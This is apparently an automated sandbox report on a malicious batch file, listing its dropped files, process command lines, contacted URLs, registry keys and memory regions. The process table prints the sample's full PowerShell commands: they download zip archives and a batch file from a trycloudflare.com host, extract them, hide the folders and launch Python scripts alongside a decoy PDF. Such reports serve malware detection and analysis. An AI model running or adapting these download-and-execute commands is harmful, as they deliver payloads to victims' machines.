Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
J1IrCccVO6.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (13190), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xbd49eecc, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00te055x.mjp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kiuv505.uzq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tyhj4zz.55l.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xublcva.pqt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a01eh1pd.w5q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrp0hymj.tu2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ma5gmo04.vis.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmlqc5da.sfp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pt1guala.hi3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qovxpkys.t0w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2qnqb10.a5h.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1u14iag.5yj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrfxbe0r.olr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yiprkict.qwp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 10 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\J1IrCccVO6.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://ride-fatal-italic-information.trycloudflare.com/DXJS.zip' -OutFile 'C:\Users\user\Downloads\DXJS.zip' }"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\DXJS.zip' -DestinationPath 'C:\Users\user\Downloads'
-Force }"
|
|
|
|
C:\Windows\System32\attrib.exe
|
attrib +h "C:\Users\user\Downloads\Python"
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe money.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe moment.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe update.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe upload.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe time.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe kam.py
|
|
|
|
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
|
python.exe momentomo.py
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://ride-fatal-italic-information.trycloudflare.com/startupppp.bat' -OutFile 'C:\Users\user\Downloads\startupppp.bat'
}"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest
-Uri 'https://ride-fatal-italic-information.trycloudflare.com/FTSP.zip' -OutFile 'C:\Users\user\Downloads\FTSP.zip' }"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\FTSP.zip' -DestinationPath 'C:\Users\user\Downloads'
-Force }"
|
|
|
|
C:\Windows\System32\attrib.exe
|
attrib +h "C:\Users\user\Downloads\Print"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ride-fatal-italic-information.trycloudflare.com/kbsfaw.pdf
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,12952766583181054471,15823528820358115948,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ride-fatal-italic-information.trycloudflare.com/kbsfaw.pdf
|
||
|
C:\Windows\System32\timeout.exe
|
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1996,i,2645576372623155973,14039107188322789898,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
There are 14 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://ride-fatal-italic-information.trycloudflare.com/DXJS.zip
|
unknown
|
|
|
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zip
|
unknown
|
|
|
|
https://ride-fatal-italic-information.trycloudflare.com
|
unknown
|
|
|
|
https://ride-fatal-italic-information.trycloudflare.com/startupppp.bat
|
unknown
|
|
|
|
https://ride-fatal-italic-information.trycloud
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/DXJS.zipQ
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/dxjs.zip
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/startupppp.batCommonProgr
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zipV
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zipHOMEDRIVE=C:HOMEPATH=
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/startupppp.batjf
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zipHOMEDRIVE
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zip.
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/DXJS.zipg
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zipHOMEDRIVE0
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/startupppp.batCommonProgramFiles=C:
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zipm
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zipYxm
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/startupppp.bat8
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/DXJS.zip1
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zipD
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/FTSP.zip7
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/startupppp.bat?
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/startupppp.batCommonProgramFiles=
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
|
https://ride-fatal-italic-information.trycloudflare.com/ftsp.zip
|
unknown
|
There are 33 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ride-fatal-italic-information.trycloudflare.com
|
unknown
|
|
|
|
google.com
|
142.250.185.174
|
||
|
www.google.com
|
142.250.185.228
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.185.228
|
www.google.com
|
United States
|
||
|
192.168.2.7
|
unknown
|
unknown
|
||
|
192.168.2.9
|
unknown
|
unknown
|
||
|
192.168.2.4
|
unknown
|
unknown
|
||
|
192.168.2.5
|
unknown
|
unknown
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
C0D947F000
|
stack
|
page read and write
|
||
|
1BF9A6F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A6A3000
|
trusted library allocation
|
page read and write
|
||
|
1BF9571A000
|
heap
|
page read and write
|
||
|
632E978000
|
stack
|
page read and write
|
||
|
2D6115BA000
|
heap
|
page read and write
|
||
|
1E6419C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
E8790FE000
|
stack
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
2D613783000
|
trusted library allocation
|
page read and write
|
||
|
1E65B977000
|
heap
|
page execute and read and write
|
||
|
1A52DC02000
|
heap
|
page read and write
|
||
|
1E6418A0000
|
heap
|
page read and write
|
||
|
1B7B3C60000
|
heap
|
page read and write
|
||
|
1BF94E91000
|
heap
|
page read and write
|
||
|
E879F0E000
|
stack
|
page read and write
|
||
|
2D6114A0000
|
heap
|
page read and write
|
||
|
1BF94F29000
|
heap
|
page read and write
|
||
|
22985AF2000
|
trusted library allocation
|
page read and write
|
||
|
1EFBD202000
|
heap
|
page read and write
|
||
|
C0D9A7E000
|
stack
|
page read and write
|
||
|
2D62B5ED000
|
heap
|
page read and write
|
||
|
632F1FC000
|
stack
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
4D9DEFE000
|
unkown
|
page readonly
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
22198B20000
|
heap
|
page read and write
|
||
|
1BF9A740000
|
remote allocation
|
page read and write
|
||
|
1BF9A60E000
|
trusted library allocation
|
page read and write
|
||
|
1EFBD213000
|
heap
|
page read and write
|
||
|
1BF9A670000
|
trusted library allocation
|
page read and write
|
||
|
2299DC43000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
22983C36000
|
heap
|
page execute and read and write
|
||
|
9C0C5FE000
|
stack
|
page read and write
|
||
|
C0D9878000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D9E77E000
|
stack
|
page read and write
|
||
|
1A52DA10000
|
heap
|
page read and write
|
||
|
1BF9A3D0000
|
trusted library allocation
|
page read and write
|
||
|
1E645421000
|
trusted library allocation
|
page read and write
|
||
|
4D9E9FE000
|
unkown
|
page readonly
|
||
|
1BF9A44F000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D614183000
|
trusted library allocation
|
page read and write
|
||
|
B08A87E000
|
stack
|
page read and write
|
||
|
D0BF35F000
|
stack
|
page read and write
|
||
|
1BF95602000
|
heap
|
page read and write
|
||
|
1A52BAD0000
|
heap
|
page read and write
|
||
|
18077410000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7B3BF0000
|
heap
|
page read and write
|
||
|
1E42B657000
|
heap
|
page read and write
|
||
|
207ACFE0000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A320000
|
trusted library allocation
|
page read and write
|
||
|
1BF96310000
|
trusted library allocation
|
page read and write
|
||
|
1E42D4C0000
|
heap
|
page read and write
|
||
|
1BF9570C000
|
heap
|
page read and write
|
||
|
1E42B702000
|
heap
|
page read and write
|
||
|
2D62B7C0000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A509000
|
heap
|
page read and write
|
||
|
1E35DFD000
|
stack
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
2D614CE4000
|
trusted library allocation
|
page read and write
|
||
|
22983900000
|
heap
|
page read and write
|
||
|
1E35EFF000
|
stack
|
page read and write
|
||
|
2298395E000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
|
23E82302000
|
heap
|
page read and write
|
||
|
1E42D602000
|
heap
|
page read and write
|
||
|
23E82213000
|
heap
|
page read and write
|
||
|
1E65B81A000
|
heap
|
page read and write
|
||
|
B08A77E000
|
stack
|
page read and write
|
||
|
1FA02F20000
|
heap
|
page read and write
|
||
|
1FA0104A000
|
heap
|
page read and write
|
||
|
E87943E000
|
stack
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A3B1000
|
trusted library allocation
|
page read and write
|
||
|
2298393E000
|
heap
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A680000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA76000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A3B0000
|
trusted library allocation
|
page read and write
|
||
|
1E6537F0000
|
trusted library allocation
|
page read and write
|
||
|
E8793BE000
|
stack
|
page read and write
|
||
|
1E42B705000
|
heap
|
page read and write
|
||
|
2D61158E000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D9D4FE000
|
unkown
|
page readonly
|
||
|
4D9E67E000
|
stack
|
page read and write
|
||
|
1FA00FC0000
|
heap
|
page read and write
|
||
|
1A52BD05000
|
heap
|
page read and write
|
||
|
1BF94E8F000
|
heap
|
page read and write
|
||
|
1EFBD260000
|
heap
|
page read and write
|
||
|
C0D9B7B000
|
stack
|
page read and write
|
||
|
B08A4F9000
|
stack
|
page read and write
|
||
|
C0D94FF000
|
stack
|
page read and write
|
||
|
E878FFE000
|
stack
|
page read and write
|
||
|
1E35CFD000
|
stack
|
page read and write
|
||
|
1FA00FE0000
|
heap
|
page read and write
|
||
|
9C0C6FF000
|
stack
|
page read and write
|
||
|
1E65B887000
|
heap
|
page read and write
|
||
|
22983C10000
|
trusted library allocation
|
page read and write
|
||
|
C0D9AFE000
|
stack
|
page read and write
|
||
|
22995BB4000
|
trusted library allocation
|
page read and write
|
||
|
2D62370A000
|
trusted library allocation
|
page read and write
|
||
|
4D9D5FE000
|
stack
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A514000
|
heap
|
page read and write
|
||
|
9C0C4F8000
|
stack
|
page read and write
|
||
|
2D62B6C0000
|
heap
|
page read and write
|
||
|
2D62B563000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
22983B80000
|
heap
|
page readonly
|
||
|
D0BF2DC000
|
stack
|
page read and write
|
||
|
1E65399B000
|
trusted library allocation
|
page read and write
|
||
|
2D611516000
|
heap
|
page read and write
|
||
|
1BF9A664000
|
trusted library allocation
|
page read and write
|
||
|
1BF95713000
|
heap
|
page read and write
|
||
|
1EFBD24A000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
207AD02B000
|
heap
|
page read and write
|
||
|
CE9FDFD000
|
stack
|
page read and write
|
||
|
D9844FF000
|
stack
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
1E65BA80000
|
heap
|
page read and write
|
||
|
CE9FBFF000
|
stack
|
page read and write
|
||
|
1B7B3D05000
|
heap
|
page read and write
|
||
|
1E641A80000
|
heap
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A6D0000
|
trusted library allocation
|
page read and write
|
||
|
2299DC60000
|
heap
|
page read and write
|
||
|
B08A073000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A670000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3D02000
|
heap
|
page read and write
|
||
|
1A52BC4A000
|
heap
|
page read and write
|
||
|
2299593A000
|
trusted library allocation
|
page read and write
|
||
|
1E653858000
|
trusted library allocation
|
page read and write
|
||
|
2D615193000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A6BA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A6FC000
|
trusted library allocation
|
page read and write
|
||
|
22983BC0000
|
trusted library allocation
|
page read and write
|
||
|
1EFBF0C0000
|
heap
|
page read and write
|
||
|
4D9DDFB000
|
stack
|
page read and write
|
||
|
207AD049000
|
heap
|
page read and write
|
||
|
22985576000
|
heap
|
page read and write
|
||
|
22198AE0000
|
heap
|
page read and write
|
||
|
1E65B9A0000
|
heap
|
page read and write
|
||
|
B08B3CD000
|
stack
|
page read and write
|
||
|
2298704E000
|
trusted library allocation
|
page read and write
|
||
|
229864F2000
|
trusted library allocation
|
page read and write
|
||
|
1BF94EFF000
|
heap
|
page read and write
|
||
|
1BF9A454000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF9A380000
|
trusted library allocation
|
page read and write
|
||
|
4D9F47E000
|
stack
|
page read and write
|
||
|
2D614EBA000
|
trusted library allocation
|
page read and write
|
||
|
2D614EB2000
|
trusted library allocation
|
page read and write
|
||
|
1BF94EB2000
|
heap
|
page read and write
|
||
|
1E6417EF000
|
heap
|
page read and write
|
||
|
B08A7FE000
|
stack
|
page read and write
|
||
|
2D623560000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
207AD057000
|
heap
|
page read and write
|
||
|
22985530000
|
heap
|
page read and write
|
||
|
7FFD9BA46000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D6114D0000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
229839F1000
|
heap
|
page read and write
|
||
|
1E653AD2000
|
trusted library allocation
|
page read and write
|
||
|
22983946000
|
heap
|
page read and write
|
||
|
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
|
2299DB80000
|
heap
|
page execute and read and write
|
||
|
E8792B9000
|
stack
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
207AD000000
|
heap
|
page read and write
|
||
|
1EFBD200000
|
heap
|
page read and write
|
||
|
1B7B3C00000
|
heap
|
page read and write
|
||
|
2D62B7F0000
|
heap
|
page read and write
|
||
|
632F0FD000
|
stack
|
page read and write
|
||
|
1BF9A656000
|
trusted library allocation
|
page read and write
|
||
|
D9843FD000
|
stack
|
page read and write
|
||
|
5738BFE000
|
stack
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
E878BDE000
|
stack
|
page read and write
|
||
|
1BF9A4FA000
|
heap
|
page read and write
|
||
|
9C0C9FE000
|
stack
|
page read and write
|
||
|
E87907E000
|
stack
|
page read and write
|
||
|
2219A4F0000
|
heap
|
page read and write
|
||
|
2299D910000
|
heap
|
page read and write
|
||
|
2D6114B0000
|
heap
|
page read and write
|
||
|
22983C54000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1E645426000
|
trusted library allocation
|
page read and write
|
||
|
207AD200000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
4D9E5FE000
|
unkown
|
page readonly
|
||
|
1BF95550000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3B60000
|
heap
|
page read and write
|
||
|
57389FD000
|
stack
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF94E7A000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
6393FF000
|
stack
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
57388FE000
|
stack
|
page read and write
|
||
|
207AD105000
|
heap
|
page read and write
|
||
|
18075B48000
|
heap
|
page read and write
|
||
|
22198A00000
|
heap
|
page read and write
|
||
|
1BF9A66C000
|
trusted library allocation
|
page read and write
|
||
|
1E64535C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
CE9FFFD000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1E644412000
|
trusted library allocation
|
page read and write
|
||
|
4D9F4FE000
|
unkown
|
page readonly
|
||
|
57386F7000
|
stack
|
page read and write
|
||
|
D9846FC000
|
stack
|
page read and write
|
||
|
1BF9A740000
|
remote allocation
|
page read and write
|
||
|
1BF95560000
|
trusted library section
|
page read and write
|
||
|
1BF9A618000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A707000
|
trusted library allocation
|
page read and write
|
||
|
CEA00FC000
|
stack
|
page read and write
|
||
|
207AF002000
|
heap
|
page read and write
|
||
|
B6FFAFF000
|
stack
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1BF9A485000
|
heap
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
1E643690000
|
heap
|
page read and write
|
||
|
7FFD9BC51000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA76000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF95EE0000
|
trusted library allocation
|
page read and write
|
||
|
229858C1000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3A80000
|
heap
|
page read and write
|
||
|
2D6117F7000
|
heap
|
page execute and read and write
|
||
|
229874FF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1A52BC60000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
4D9D3F7000
|
stack
|
page read and write
|
||
|
1BF94E78000
|
heap
|
page read and write
|
||
|
1BF9A4F4000
|
heap
|
page read and write
|
||
|
4D9EA7E000
|
stack
|
page read and write
|
||
|
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
|
4D9E1FE000
|
unkown
|
page readonly
|
||
|
1E641A84000
|
heap
|
page read and write
|
||
|
2D61157A000
|
heap
|
page read and write
|
||
|
2D62B61D000
|
heap
|
page read and write
|
||
|
1E6419B0000
|
heap
|
page readonly
|
||
|
2D6117E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1E65B87A000
|
heap
|
page read and write
|
||
|
6392FD000
|
stack
|
page read and write
|
||
|
5738CFC000
|
stack
|
page read and write
|
||
|
1E6417D0000
|
heap
|
page read and write
|
||
|
1E35AF7000
|
stack
|
page read and write
|
||
|
1FA00FF0000
|
heap
